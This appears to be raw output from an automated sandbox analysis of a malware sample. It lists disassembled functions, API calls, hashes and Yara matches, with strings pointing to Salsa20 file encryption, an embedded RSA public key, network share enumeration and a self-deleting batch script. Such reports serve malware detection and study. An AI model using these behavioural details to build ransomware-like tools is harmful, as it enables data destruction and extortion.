                                                                                                        • Opcode Fuzzy Hash: 9cd4fbcd253e25c62f3a82a700930f321697d9d42e18c2a316fe6f9f103f8c46
                                                                                                        • Instruction Fuzzy Hash: 82F0283190021D66CB00FAA8DC52EDEBBACEF40330F044466FD04A6282DFB49B48B2D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F64AE0: GetStdHandle.KERNEL32(000000F4,00F64C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00F6480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00F61D37,00000000,00F1CDAE,00000001,00000001), ref: 00F64AFA
                                                                                                          • Part of subcall function 00F64AE0: GetFileType.KERNEL32(00000000), ref: 00F64B05
                                                                                                          • Part of subcall function 00F64AE0: __vfwprintf_p.LIBCMT ref: 00F64B27
                                                                                                        • _raise.LIBCMT ref: 00F64C18
                                                                                                          • Part of subcall function 00F3A12E: __getptd_noexit.LIBCMT ref: 00F3A16B
                                                                                                          • Part of subcall function 00F37CEC: _doexit.LIBCMT ref: 00F37CF6
                                                                                                        Strings
                                                                                                        • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00F64C0C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                        • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                        • API String ID: 2149077303-4210838268
                                                                                                        • Opcode ID: 790a41ceb59e7e553eec3c08c7a7362dd7f2769c3861f1bd8db94303f3465423
                                                                                                        • Instruction ID: 4319a33543baf95fc040fb2d82d6bd22e6263733cceae4d8dff24ec21ab9dc29
                                                                                                        • Opcode Fuzzy Hash: 790a41ceb59e7e553eec3c08c7a7362dd7f2769c3861f1bd8db94303f3465423
                                                                                                        • Instruction Fuzzy Hash: ABD05E79088300BFD9123B90AC03A0A7AA1BF48724F408414F29A000A2C67A8120BB17
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                        • String ID:
                                                                                                        • API String ID: 2799698630-0
                                                                                                        • Opcode ID: 99b0959d05d18ea14f0c3cfe204045000cdc59a3da1f0e462c521042a6227104
                                                                                                        • Instruction ID: 6d6ccb7fd7dd9e526316216733b0891b551655494d0cae1fa85706e1a8c48976
                                                                                                        • Opcode Fuzzy Hash: 99b0959d05d18ea14f0c3cfe204045000cdc59a3da1f0e462c521042a6227104
                                                                                                        • Instruction Fuzzy Hash: 4E519F71D00229CAEF60DF60EC457EEB7B5BF21318F0441A9D40D67251EB769A88EF52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock_file_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 26237723-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        • __lock_file.LIBCMT ref: 00F33A7D
                                                                                                          • Part of subcall function 00F30E53: __lock.LIBCMT ref: 00F30E76
                                                                                                        • __fclose_nolock.LIBCMT ref: 00F33A88
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                        • String ID:
                                                                                                        • API String ID: 2800547568-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __lock_file.LIBCMT ref: 00F33489
                                                                                                        • __ftell_nolock.LIBCMT ref: 00F33494
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                        • String ID:
                                                                                                        • API String ID: 2999321469-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 00F3FB7B
                                                                                                          • Part of subcall function 00F38AF7: __mtinitlocknum.LIBCMT ref: 00F38B09
                                                                                                          • Part of subcall function 00F38AF7: __amsg_exit.LIBCMT ref: 00F38B15
                                                                                                          • Part of subcall function 00F38AF7: EnterCriticalSection.KERNEL32(00000000,?,00F350D7,0000000D), ref: 00F38B22
                                                                                                        • __tzset_nolock.LIBCMT ref: 00F3FB8E
                                                                                                          • Part of subcall function 00F3FE47: __lock.LIBCMT ref: 00F3FE6C
                                                                                                          • Part of subcall function 00F3FE47: ____lc_codepage_func.LIBCMT ref: 00F3FEB3
                                                                                                          • Part of subcall function 00F3FE47: __getenv_helper_nolock.LIBCMT ref: 00F3FED4
                                                                                                          • Part of subcall function 00F3FE47: _free.LIBCMT ref: 00F3FF07
                                                                                                          • Part of subcall function 00F3FE47: _strlen.LIBCMT ref: 00F3FF0E
                                                                                                          • Part of subcall function 00F3FE47: __malloc_crt.LIBCMT ref: 00F3FF15
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1282695788-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00F37B11
                                                                                                          • Part of subcall function 00F37AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00F37B16,00000000,?,00F38BCA,000000FF,0000001E,01017BD0,00000008,00F38B0E,00000000,00000000), ref: 00F37AE6
                                                                                                          • Part of subcall function 00F37AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00F37AF8
                                                                                                        • ExitProcess.KERNEL32 ref: 00F37B1A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 2427264223-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F218DD
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00F218E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFreeHandleVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2443081362-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F269DF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                        • String ID:
                                                                                                        • API String ID: 120817956-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F267E6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                        • String ID:
                                                                                                        • API String ID: 120817956-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F265C5
                                                                                                          • Part of subcall function 00F33B4C: _malloc.LIBCMT ref: 00F33B64
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 657562460-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 00F2FA25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F20BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00F20C12
                                                                                                        • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 00F2FDA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumMessageOpenSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1835186980-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F33B64
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: RtlAllocateHeap.NTDLL(00840000,00000000,00000001,00000001,?,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30CA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 501242067-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,01039230), ref: 00F2FDD6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __fsopen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3646066109-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Similarity
                                                                                                        • API ID: __wfsopen
                                                                                                        • String ID:
                                                                                                        • API String ID: 197181222-0
                                                                                                        • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                        • Instruction ID: 83aea763ee10046adddd2057c6130aa53921fdd966572d5e321cfb3be07ef3e9
                                                                                                        • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                        • Instruction Fuzzy Hash: FFB092B244020C77CE012A82EC02A493B19AB416A0F008020FB0C18161A677A6A0AA89
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _doexit.LIBCMT ref: 00F37F47
                                                                                                          • Part of subcall function 00F37E0E: __lock.LIBCMT ref: 00F37E1C
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(01017B08,0000001C,00F37CFB,00000000,00000001,00000000,?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37E5B
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37E6C
                                                                                                          • Part of subcall function 00F37E0E: EncodePointer.KERNEL32(00000000,?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37E85
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(-00000004,?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37E95
                                                                                                          • Part of subcall function 00F37E0E: EncodePointer.KERNEL32(00000000,?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37E9B
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37EB1
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37EBC
                                                                                                        Similarity
                                                                                                        • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2158581194-0
                                                                                                        • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                        • Instruction ID: 97ccff28d8c60aa48329d1f1fadcbdcda5dcda6d069775e124362c29f2f1224e
                                                                                                        • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                        • Instruction Fuzzy Hash: AFB012B198430C33DA213642EC03F053B0C4740B60F200070FA0C1C1E1A593B9A050C9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00F22966
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 626452242-0
                                                                                                        • Opcode ID: bf3a5e84baf7486ea567efe3534a465196d7237f4677fe669709c9ba300ba886
                                                                                                        • Instruction ID: 8278f57f6ff64d3ddcf5e6a7110220a79cc08cf45bd8c33d34d9bb79e9b528ba
                                                                                                        • Opcode Fuzzy Hash: bf3a5e84baf7486ea567efe3534a465196d7237f4677fe669709c9ba300ba886
                                                                                                        • Instruction Fuzzy Hash: D411BE71A01229EBDB00DF59DC41BDFBBA8EF05724F004129F819A7280C77A9A15DBD6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _wcscmp.LIBCMT ref: 00F482B9
                                                                                                        • _wcscmp.LIBCMT ref: 00F482CA
                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00F48568,?,00000000), ref: 00F482E6
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00F48568,?,00000000), ref: 00F48310
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 1351282208-711371036
                                                                                                        • Opcode ID: faf33b4fde292ef0379bda4de5632ae41479b707e3961a7339c999803269385d
                                                                                                        • Instruction ID: 3ecd29be6da16623616787b7b7761200d1883f053bb28d77389b1014961c3548
                                                                                                        • Opcode Fuzzy Hash: faf33b4fde292ef0379bda4de5632ae41479b707e3961a7339c999803269385d
                                                                                                        • Instruction Fuzzy Hash: 9B014431A05616AAD7119E58DC45FDE3F99AB05BA5F008015FE04DA051FFB0DB42F7D4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk, xrefs: 00F29EC4
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk
                                                                                                        • API String ID: 2102423945-2415271991
                                                                                                        • Opcode ID: c91f066040b15bac0ef4d5de21fbd094c9b5496f663ada4d07d9c07c70b9796f
                                                                                                        • Instruction ID: 2b22f12ca91f3fc0742e55a493cacf0cd4ead4d1569cf8a072cab026fb1f8216
                                                                                                        • Opcode Fuzzy Hash: c91f066040b15bac0ef4d5de21fbd094c9b5496f663ada4d07d9c07c70b9796f
                                                                                                        • Instruction Fuzzy Hash: 95F03930688B5065F3709B50FC16B153A91731AB08F200048E2C41E2D6D3FF2148E39D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00F1C090
                                                                                                        • input != nullptr && output != nullptr, xrefs: 00F1C095
                                                                                                        Similarity
                                                                                                        • API ID: __wassert
                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                        • Opcode ID: 3ae4ddc2b7fa20cd13afabebd1a95491edd6d3546f55db01dd4af2da2fb07ac2
                                                                                                        • Instruction ID: de06a94da523d87b2abf2ff87c6902075d69443e2c982f1015c6f4912b0a6f63
                                                                                                        • Opcode Fuzzy Hash: 3ae4ddc2b7fa20cd13afabebd1a95491edd6d3546f55db01dd4af2da2fb07ac2
                                                                                                        • Instruction Fuzzy Hash: 97C18E75E003499FCB54CFA9C885ADEFBF1FF48310F24856AE919E7201E334AA558B94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00F224FE
                                                                                                        • GetLastError.KERNEL32 ref: 00F22509
                                                                                                        • CloseHandle.KERNEL32 ref: 00F2251C
                                                                                                        • CloseHandle.KERNEL32 ref: 00F22539
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00F22550
                                                                                                        • GetLastError.KERNEL32 ref: 00F2255B
                                                                                                        • CloseHandle.KERNEL32 ref: 00F2256E
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                        • API String ID: 2372642624-488272950
                                                                                                        • Opcode ID: 7b9c1b3bb6bf322fd536fd6f85fd3ee843b462960028e042f53b856396b5b4dd
                                                                                                        • Instruction ID: 9288ad868330e6beb3553e169c152616d8c298ca4c49b665ccee4b1b562e3688
                                                                                                        • Opcode Fuzzy Hash: 7b9c1b3bb6bf322fd536fd6f85fd3ee843b462960028e042f53b856396b5b4dd
                                                                                                        • Instruction Fuzzy Hash: C0719F7294021DABDB20DBB0EC89FEA77ADFB44300F004596F649D6050DB799A88DFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32 ref: 00F21915
                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00F21932
                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F21941
                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F21948
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00F21956
                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00F21962
                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00F21974
                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00F2198B
                                                                                                        • lstrcatW.KERNEL32(00000000,01010260), ref: 00F21993
                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00F21999
                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00F219A3
                                                                                                        • _memset.LIBCMT ref: 00F219B8
                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00F219DC
                                                                                                          • Part of subcall function 00F22BA0: lstrlenW.KERNEL32(?), ref: 00F22BC9
                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F21A01
                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00F21A04
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                        • String ID: failed with error
                                                                                                        • API String ID: 4182478520-946485432
                                                                                                        • Opcode ID: 9ca23155c8611b8c96a257da9efc262019f6b3a18b265f62b4748070803dd852
                                                                                                        • Instruction ID: 350c1437f10f977c02b2b9c5ad1b9ae6f474780ac3937de60df7d3623d789dcc
                                                                                                        • Opcode Fuzzy Hash: 9ca23155c8611b8c96a257da9efc262019f6b3a18b265f62b4748070803dd852
                                                                                                        • Instruction Fuzzy Hash: 4D210732A4122DB7EB116BA09C4AFAE3B79EF85B11F100016FA05B6190DE781D41FBE5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F649A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00F64B72), ref: 00F649C7
                                                                                                          • Part of subcall function 00F649A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F649D7
                                                                                                          • Part of subcall function 00F649A0: GetDesktopWindow.USER32 ref: 00F649FB
                                                                                                          • Part of subcall function 00F649A0: GetProcessWindowStation.USER32(?,00F64B72), ref: 00F64A01
                                                                                                          • Part of subcall function 00F649A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00F64B72), ref: 00F64A1C
                                                                                                          • Part of subcall function 00F649A0: GetLastError.KERNEL32(?,00F64B72), ref: 00F64A2A
                                                                                                          • Part of subcall function 00F649A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00F64B72), ref: 00F64A65
